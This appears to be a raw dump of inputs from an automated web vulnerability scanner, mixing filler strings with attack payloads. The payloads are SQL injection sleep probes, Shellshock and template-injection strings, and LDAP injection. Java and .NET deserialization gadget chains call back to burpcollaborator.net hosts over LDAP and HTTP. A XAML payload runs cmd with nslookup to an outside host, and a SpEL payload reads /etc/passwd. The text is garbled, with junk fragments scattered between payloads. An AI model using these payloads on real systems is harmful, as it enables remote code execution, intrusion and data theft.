�2����� _System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35%System.Management.Automation.PSObjectCliXml� Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5 Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5 Microsoft.Management.Infrastructure.CimInstance System.Object RunspaceInvoke5 RunspaceInvoke5 System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 System.Array System.Object <ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"> <ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" > <ObjectDataProvider.MethodParameters> <System:String>cmd</System:String> <System:String>/c "nslookup b6ify5s5vcegimr83stnjh6wqnwfk4.burpcollaborator.net " </System:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary> System.Collections.ArrayList System.Object RunspaceInvoke5 System.Management.Automation 460929192 <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS>
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB2nt1e49vl1
AAAA
fyj5yfqvdf
BA==
BBBBB
AAAA
BBBBB"
ddddddasdadas
BBBBB
AAAA
BBBBB"
AAAA
BBBBB34922283' or '1161'='1161'
AAAA
BBBBB45507019' or '8279'='8284
BA==
BBBBB
AAAA
BBBBB70511124' or '8869'='8869
AAAA
BBBBB70511124' or '8869'='8869
AAAA
BBBBB',0)waitfor delay'0:0:20'--
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB')waitfor delay'0:0:20'--
'
BBBBB
AAAA
BBBBB' waitfor delay'0:0:20'--
AAAA
BBBBB,(select*from(select(sleep(20)))a)
AAAA
org.springframework.aop.target.HotSwappableTargetSourcetargetorg.apache.xbean.naming.context.ContextUtil$ReadOnlyBindingisRelative0namefooclassNamefullNameisRel1valuejavax.naming.ReferenceclassNamefooclassFactoryFreddyclassFactoryLocationhttp://jd060aoajtblut8wmp6dfwog0761uq.burpcollaborator.net/addrsjava.util.Vector0contextorg.apache.xbean.naming.context.WritableContextcacheReferences0supportReferenceable0checkDereferenceDifferent0assumeDereferenceBound0nameInNamespacemodifiable0inCallwriteLockbindingsRefindexRefcontextFederationmasterContextparsedNameInNamespacecontextAccessboundObj31org.springframework.aop.target.HotSwappableTargetSourcetargetcom.sun.org.apache.xpath.internal.objects.XStringm_objﯶ...m_parent6
AAAA
BBBBB' and (select*from(select(sleep(20)))a)--
AAAA
org.springframework.aop.target.HotSwappableTargetSourcetargetorg.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolderadvisororg.springframework.aop.aspectj.AspectJPointcutAdvisororderadviceorg.springframework.aop.aspectj.AspectJAroundAdvicedeclaringClassjava.lang.Classnamejava.lang.ObjectmethodNametoStringaspectNamedeclarationOrder0throwingNamereturningNamediscoveredReturningTypediscoveredThrowingTypejoinPointArgumentIndex0joinPointStaticPartArgumentIndex0argumentsIntrospected0discoveredReturningGenericTypeparameterTypes[java.lang.Class0pointcutaspectInstanceFactoryorg.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactorynameldap://m4r9rdfdaw2olwzzdsxg6zfjrax3ls.burpcollaborator.net/beanFactoryorg.springframework.jndi.support.SimpleJndiBeanFactoryresourceRef1shareableResourcesjava.util.HashSet1ldap://m4r9rdfdaw2olwzzdsxg6zfjrax3ls.burpcollaborator.net/singletonObjectsresourceTypesloggerorg.apache.commons.logging.impl.NoOpLogjndiTemplateorg.springframework.jndi.JndiTemplateloggerorg.apache.commons.logging.impl.NoOpLogenvironmentaspectMetadataargumentNamesargumentBindingspointcutcomparator1org.springframework.aop.target.HotSwappableTargetSourcetargetcom.sun.org.apache.xpath.internal.objects.XStringm_objᦥ...m_parent15
AAAA
BBBBB'+(select*from(select(sleep(20)))a)+'
AAAA
org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisoradviceBeanNameldap://mzp9mdad5wxogwuz8ssg1zajmas2gr.burpcollaborator.net/orderpointcutorg.springframework.aop.TruePointcutbeanFactoryorg.springframework.jndi.support.SimpleJndiBeanFactoryresourceRef1shareableResourcesjava.util.HashSet1ldap://mzp9mdad5wxogwuz8ssg1zajmas2gr.burpcollaborator.net/singletonObjectsresourceTypesloggerorg.apache.commons.logging.impl.NoOpLogjndiTemplateorg.springframework.jndi.JndiTemplateloggerorg.apache.commons.logging.impl.NoOpLogenvironment1org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisoradviceBeanNameorderpointcut2beanFactory10
AAAA
BBBBB
AAAA
com.rometools.rome.feed.impl.EqualsBeanbeanClassjava.lang.Classnamecom.rometools.rome.feed.impl.ToStringBeanobjcom.rometools.rome.feed.impl.ToStringBeanbeanClassjava.lang.Classnamecom.sun.rowset.JdbcRowSetImplobjcom.sun.rowset.JdbcRowSetImplcommandURLdataSourceldap://huf4h8580rsjbrpu3nnbwu5eh5nwbl.burpcollaborator.net/rowSetType1004showDeleted0queryTimeout0maxRows0maxFieldSize0concurrency1008readOnly1escapeProcessing1isolation2fetchDir1000fetchSize0connpsrsrowsMDresMDiMatchColumnsjava.util.Vector10-1-1-1-1-1-1-1-1-1-1strMatchColumnsjava.util.Vector10foobinaryStreamunicodeStreamasciiStreamcharStreammaplistenersparamsjava.util.Hashtable111
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB'(select*from(select(sleep(20)))a)'
AAAA
BBBBB
AAAA
com.caucho.naming.QName_contextjavax.naming.spi.ContinuationDirContextcpejavax.naming.CannotProceedExceptionrootExceptiondetailMessagecauseremainingNewNameenvironmentaltNamealtNameCtxresolvedNameresolvedObjjavax.naming.ReferenceclassNameFooclassFactoryFreddyclassFactoryLocationhttp://xopkbozou7mz57jax3hrqazublhb50.burpcollaborator.net/addrsjava.util.Vector0remainingNamestackTrace[java.lang.StackTraceElement9java.lang.StackTraceElementdeclaringClassmarshalsec.gadgets.ResinmethodNamemakeResinQNamefileNameResin.javalineNumber56java.lang.StackTraceElementdeclaringClasssun.reflect.NativeMethodAccessorImplmethodNameinvoke0fileNamelineNumber-2java.lang.StackTraceElementdeclaringClasssun.reflect.NativeMethodAccessorImplmethodNameinvokefileNamelineNumber-1java.lang.StackTraceElementdeclaringClasssun.reflect.DelegatingMethodAccessorImplmethodNameinvokefileNamelineNumber-1java.lang.StackTraceElementdeclaringClassjava.lang.reflect.MethodmethodNameinvokefileNamelineNumber-1java.lang.StackTraceElementdeclaringClassmarshalsec.MarshallerBasemethodNamecreateObjectfileNameMarshallerBase.javalineNumber331java.lang.StackTraceElementdeclaringClassmarshalsec.MarshallerBasemethodNamedoRunfileNameMarshallerBase.javalineNumber165java.lang.StackTraceElementdeclaringClassmarshalsec.MarshallerBasemethodNamerunfileNameMarshallerBase.javalineNumber121java.lang.StackTraceElementdeclaringClassmarshalsec.BurlapmethodNamemainfileNameBurlap.javalineNumber64suppressedExceptionsenvjava.util.HashtablecontCtx_items2foobar1com.sun.org.apache.xpath.internal.objects.XStringm_obj맦...m_parent18
AAAA
BBBBB'
AAAA
BBBBB'
AAAA
CjOBAW9yZy5zcHJpbmdmcmFtZXdvcmsuYmVhbnMuZmFjdG9yeS5jb25maWcuUHJvcGVydHlQYXRoRmFjdG9yeUJlYW4ddGFyZ2V0QmVhbk5hbWUZcHJvcGVydHlQYXRoF2JlYW5GYWN0b3J5BoMRbGRhcDovL2M2amhhZzEyc2ZlZGtlNjBzcnZuNnY0eXhwM2lyNy5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAGB2ZvbwoTbW9yZy5zcHJpbmdmcmFtZXdvcmsuam5kaS5zdXBwb3J0LlNpbXBsZUpuZGlCZWFuRmFjdG9yeSVzaGFyZWFibGVSZXNvdXJjZXMKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAwEGCA==
AAAA
BBBBB'+(select load_file('\\\\b9leva2rjzmwfcxi0ytcnb9yepkq8gw7zvqldc11.burpcollaborator.net\\qrj'))+'
AAAA
3�org.springframework.beans.factory.config.PropertyPathFactoryBeantargetBeanNamepropertyPathbeanFactory�ldap://turyyxpjgw2u8vuhg8j4ucsfl6ryfn.burpcollaborator.net/ foo morg.springframework.jndi.support.SimpleJndiBeanFactory%shareableResources Cflex.messaging.io.ArrayCollection
AAAA
BBBBB
AAAA
ChNnY29tLm1jaGFuZ2UudjIuYzNwMC5XcmFwcGVyQ29ubmVjdGlvblBvb2xEYXRhU291cmNlK3VzZXJPdmVycmlkZXNBc1N0cmluZwaXH0hleEFzY2lpU2VyaWFsaXplZE1hcDphY2VkMDAwNTczNzIwMDNkNjM2ZjZkMmU2ZDYzNjg2MTZlNjc2NTJlNzYzMjJlNmU2MTZkNjk2ZTY3MmU1MjY1NjY2NTcyNjU2ZTYzNjU0OTZlNjQ2OTcyNjU2Mzc0NmY3MjI0NTI2NTY2NjU3MjY1NmU2MzY1NTM2NTcyNjk2MTZjNjk3YTY1NjQ2MjE5ODVkMGQxMmFjMjEzMDIwMDA0NGMwMDBiNjM2ZjZlNzQ2NTc4NzQ0ZTYxNmQ2NTc0MDAxMzRjNmE2MTc2NjE3ODJmNmU2MTZkNjk2ZTY3MmY0ZTYxNmQ2NTNiNGMwMDAzNjU2ZTc2NzQwMDE1NGM2YTYxNzY2MTJmNzU3NDY5NmMyZjQ4NjE3MzY4NzQ2MTYyNmM2NTNiNGMwMDA0NmU2MTZkNjU3MTAwN2UwMDAxNGMwMDA5NzI2NTY2NjU3MjY1NmU2MzY1NzQwMDE4NGM2YTYxNzY2MTc4MmY2ZTYxNmQ2OTZlNjcyZjUyNjU2NjY1NzI2NTZlNjM2NTNiNzg3MDcwNzA3MDczNzIwMDE2NmE2MTc2NjE3ODJlNmU2MTZkNjk2ZTY3MmU1MjY1NjY2NTcyNjU2ZTYzNjVlOGM2OWVhMmE4ZTk4ZDA5MDIwMDA0NGMwMDA1NjE2NDY0NzI3Mzc0MDAxMjRjNmE2MTc2NjEyZjc1NzQ2OTZjMmY1NjY1NjM3NDZmNzIzYjRjMDAwYzYzNmM2MTczNzM0NjYxNjM3NDZmNzI3OTc0MDAxMjRjNmE2MTc2NjEyZjZjNjE2ZTY3MmY1Mzc0NzI2OTZlNjczYjRjMDAxNDYzNmM2MTczNzM0NjYxNjM3NDZmNzI3OTRjNmY2MzYxNzQ2OTZmNmU3MTAwN2UwMDA3NGMwMDA5NjM2YzYxNzM3MzRlNjE2ZDY1NzEwMDdlMDAwNzc4NzA3MzcyMDAxMDZhNjE3NjYxMmU3NTc0Njk2YzJlNTY2NTYzNzQ2ZjcyZDk5NzdkNWI4MDNiYWYwMTAzMDAwMzQ5MDAxMTYzNjE3MDYxNjM2OTc0Nzk0OTZlNjM3MjY1NmQ2NTZlNzQ0OTAwMGM2NTZjNjU2ZDY1NmU3NDQzNmY3NTZlNzQ1YjAwMGI2NTZjNjU2ZDY1NmU3NDQ0NjE3NDYxNzQwMDEzNWI0YzZhNjE3NjYxMmY2YzYxNmU2NzJmNGY2MjZhNjU2Mzc0M2I3ODcwMDAwMDAwMDAwMDAwMDAwMDc1NzIwMDEzNWI0YzZhNjE3NjYxMmU2YzYxNmU2NzJlNGY2MjZhNjU2Mzc0M2I5MGNlNTg5ZjEwNzMyOTZjMDIwMDAwNzg3MDAwMDAwMDBhNzA3MDcwNzA3MDcwNzA3MDcwNzA3ODc0MDAwNjQ2NzI2NTY0NjQ3OTc0MDBjODY4NzQ3NDcwM2EyZjJmNmQ3OTZmNzIzMjcxNzQ2MzZiNzAzNjZlNjM2Zjc5NjE2YjMxNmU3ODc5MzU3NzM4NzA3YTc2NzE2YTY2MmU2Mjc1NzI3MDYzNmY2YzZjNjE2MjZmNzI2MTc0NmY3MjJlNmU2NTc0MmYyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjA3NDAwMDM0NjZmNmY7
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
"-->'-->`-->
BBBBB
DQ==
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA]]>><
BBBBB
AAAA
BBBBB
AAAA
BBBBB
uno
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
*)(!(!(objectClass=*))
BBBBB
AAAA
<__context class="javax.naming.spi.ContinuationDirContext">marshalsec.gadgets.Resin.makeResinQName(Resin.java:56)sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)java.lang.reflect.Method.invoke(Unknown Source)marshalsec.MarshallerBase.createObject(MarshallerBase.java:331)marshalsec.MarshallerBase.doRun(MarshallerBase.java:165)marshalsec.MarshallerBase.run(MarshallerBase.java:121)marshalsec.XStream.main(XStream.java:89)FooFreddyhttp://u50j7yu10cixa0f8m73vjadqyh4asz.burpcollaborator.net/<__items>foobar?
AAAA
BBBBB
AAAA
BBBBB
*)(!(objectClass=*)
BBBBB
AAAAAA==
BBBBB
AAAA
com.rometools.rome.feed.impl.ToStringBeancom.sun.rowset.JdbcRowSetImpl1008true100002000true1004falseldap://4x2tz8mbsma72a7iehv5bk50qrwlka.burpcollaborator.net/-1-1-1-1-1-1-1-1-1-1foo
AAAA
BBBBB
AAAA
BBBBB
*)(objectClass=*
BBBBB
dddd
BBBBB
AAAA
ldap://h9r6blyo4zmkenjvqu7inxhd248zwo.burpcollaborator.net/trueldap://h9r6blyo4zmkenjvqu7inxhd248zwo.burpcollaborator.net/
AAAA
BBBBB
AAAA
BBBBB
AAAA
false000trueldap://0hipj467ciu3m6reydf1vgpwangj48.burpcollaborator.net/ldap://0hipj467ciu3m6reydf1vgpwangj48.burpcollaborator.net/java.lang.ObjecttoString?
AAAA
BBBBB
AAAA
footruefooFreddyhttp://648v6atdzoh99ceklj27imc2xt3qrf.burpcollaborator.net/falsefalsefalsefalsefalsefalse?
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
'
AAAA
BBBBB
AAAA
BBBBB
AAAA
4uz7g3nk4s7p05iblre584urzi5jt9h15svfm3b.burpcollaborator.net
safety
100 % saety guarentee or the chemicals.
AAAA
() { :;}; /bin/sleep 0
AAAA
BBBBB
AAAA
BBBBB
kzs/AAAA
BBBBB
AAAA
BBBBB{${sleep(20)}}
AAAA
() { :;}; /bin/sleep 11
AAAA
BBBBB
AAAA
BBBBB
././AAAA
BBBBB
AAAA
BBBBB'.sleep(20).'
AAAA
`sleep 11`
AAAA
BBBBB
AAAA
:\n import time\n time.sleep(20)','a','single'))
AAAA
$(sleep 11)
AAAA
BBBBB'+sleep(20.to_i)+'
./AAAA
BBBBB
AAAA
BBBBB
.../AAAA
BBBBB
twqdsDtersdt
dasdasdasdas
AAAA
${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"timeout","11"})).start()).getInputStream()))).readLine()}${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"sleep","11"})).start()).getInputStream()))).readLine()}
AAAA
BBBBB
AAAA
BBBBBq3sgd%>rgiy5'/"
AAAA
() { _; } >_[$($())] { /bin/sleep 11; }
AAAA
BBBBB
AAAA
BBBBB%}rggi5'/"
AAAA
%{8601*5336}
AAAA
BBBBB
/etc/passwd
BBBBB
AAAA
BBBBB}}bd05q'/"
AAAA
4625*1183
AAAA
BBBBB
AAAA
jcupi{{187*417}}xo83t
AAAA
${6576*1410}
AAAA
vt385${791*742}j8w31
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
{"$type":""}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA''
BBBBB
{"__type":""}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA''
BBBBB
sdd
BBBBB
AAAA
BBBBB
{"$types":{"":""}}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA'
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA'
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
{"__type":""}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
DQ==
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
TestTESTtest
TestTESTtest
AAEAAAD/
BBBBB
AAAA
BBBBB
�
BBBBB
AAAA
BBBBB
AAAA
../WEB-INF/web.xml;x=
AAAA
TXQAAE10ADdvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC50YXJnZXQuSG90U3dhcHBhYmxlVGFyZ2V0U291cmNlUwAGdGFyZ2V0TXQAO29yZy5hcGFjaGUueGJlYW4ubmFtaW5nLmNvbnRleHQuQ29udGV4dFV0aWwkUmVhZE9ubHlCaW5kaW5nUwAKaXNSZWxhdGl2ZUZTAARuYW1lUwADZm9vUwAJY2xhc3NOYW1lTlMACGZ1bGxOYW1lTlMABWlzUmVsVFMABXZhbHVlTXQAFmphdmF4Lm5hbWluZy5SZWZlcmVuY2VTAAljbGFzc05hbWVTAANmb29TAAxjbGFzc0ZhY3RvcnlTAAZGcmVkZHlTABRjbGFzc0ZhY3RvcnlMb2NhdGlvblMAyGh0dHA6Ly8yc3ZhZ3l5OWxzMHU4MDQ5dmpkNmQyMmkzOTk4eHguYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUwAFYWRkcnNWdAAQamF2YS51dGlsLlZlY3RvcmwAAAAAenpTAAdjb250ZXh0TXQAL29yZy5hcGFjaGUueGJlYW4ubmFtaW5nLmNvbnRleHQuV3JpdGFibGVDb250ZXh0UwAPY2FjaGVSZWZlcmVuY2VzRlMAFHN1cHBvcnRSZWZlcmVuY2VhYmxlRlMAGWNoZWNrRGVyZWZlcmVuY2VEaWZmZXJlbnRGUwAWYXNzdW1lRGVyZWZlcmVuY2VCb3VuZEZTAA9uYW1lSW5OYW1lc3BhY2VOUwAKbW9kaWZpYWJsZUZTAAZpbkNhbGxOUwAJd3JpdGVMb2NrTlMAC2JpbmRpbmdzUmVmTlMACGluZGV4UmVmTlMAEWNvbnRleHRGZWRlcmF0aW9uTlMADW1hc3RlckNvbnRleHROUwAVcGFyc2VkTmFtZUluTmFtZXNwYWNlTlMADWNvbnRleHRBY2Nlc3NOelMACGJvdW5kT2JqUgAAAAN6elIAAAABTXQAN29yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLnRhcmdldC5Ib3RTd2FwcGFibGVUYXJnZXRTb3VyY2VTAAZ0YXJnZXRNdAAxY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWFN0cmluZ1MABW1fb2JqUwAE5pe/AgMXUwAIbV9wYXJlbnROenpSAAAABno=
AAAA
%E5%98%8A%E5%98%8DX-Injection:%20test
AAAA{${sleep(20)}}
BBBBB
AAAA
[""]
AAAA
${applicationScope}
AAAA
BBBBB
AAAA
BBBBB
AAAA
${485*351}
uvotw5ovps
BBBBB
AAAA
["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",{"transletBytecodes":["yv66vgAAADQAJQoABwATCgAUABUIABYKABQAFwoAGAAZBwAaBwAbAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHABwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEAEktydWVnZXJLb2ZmZWUuamF2YQwACAAJBwAdDAAeAB8BAMhjbWQgL2MgcGluZyAtbiAyMSAxMjcuMC4wLjEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAwAIAAhBwAiDAAjACQBAA1LcnVlZ2VyS29mZmVlAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAAd3YWl0Rm9yAQADKClJACEABgAHAAAAAAADAAEACAAJAAIACgAAADEAAgABAAAAESq3AAG4AAISA7YABLYABVexAAAAAQALAAAADgADAAAAAgAEAAMAEAAEAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAACAABAA4AEAABAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAADAABABEAAAACABI="],"transletName":"a.b","outputProperties":{}}]
AAAA
#{applicationScope}
AAAA
BBBBB
AAAA
["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",{"transletBytecodes":["yv66vgAAADQAJQoABwATCgAUABUIABYKABQAFwoAGAAZBwAaBwAbAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHABwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEAEktydWVnZXJLb2ZmZWUuamF2YQwACAAJBwAdDAAeAB8BAMhwaW5nIC1jIDIxIDEyNy4wLjAuMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAwAIAAhBwAiDAAjACQBAA1LcnVlZ2VyS29mZmVlAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAAd3YWl0Rm9yAQADKClJACEABgAHAAAAAAADAAEACAAJAAIACgAAADEAAgABAAAAESq3AAG4AAISA7YABLYABVexAAAAAQALAAAADgADAAAAAgAEAAMAEAAEAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAACAABAA4AEAABAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAADAABABEAAAACABI="],"transletName":"a.b","outputProperties":{}}]
AAAA' and 8308=8308'--
BBBBB
AAAA3utp4dsolz
BBBBB
AAAA' and 6995=6995--
BBBBB
AAAA' and 3342=3350--
BBBBB
AAAA' and 4959=4959--
BBBBB
AAAA' and '7281'='7281'
BBBBB
AAAA
#{485*351}
AAAA
["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"ldap://1npcrfuwgpk8ylpfaxz73fvuqlwbk0.burpcollaborator.net/","loginTimeout":0}]
AAAA
(new+java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("cat+/etc/passwd").getInputStream()),"UTF-8")).useDelimiter("\\A").next()
AAAA
BBBBB
AAAA
["com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",{"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f3063646267656a76356f39376e6b65657a776f3673656b74666b6c6239302e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;"}]
AAAA
BBBBB$zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c%26zq%253d
4d2hxim9eq��1qibjwnxt9
BBBBB
AAAA
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://lvkwzz2go9ss65xzih7rbz3ey54xsm.burpcollaborator.net/","autoCommit":true}]
AAAA
BBBBB%26zq=x%253c%2561%2560%2527%2522%2524%257b%257b%255c
AAAA
BBBBB
AAAA
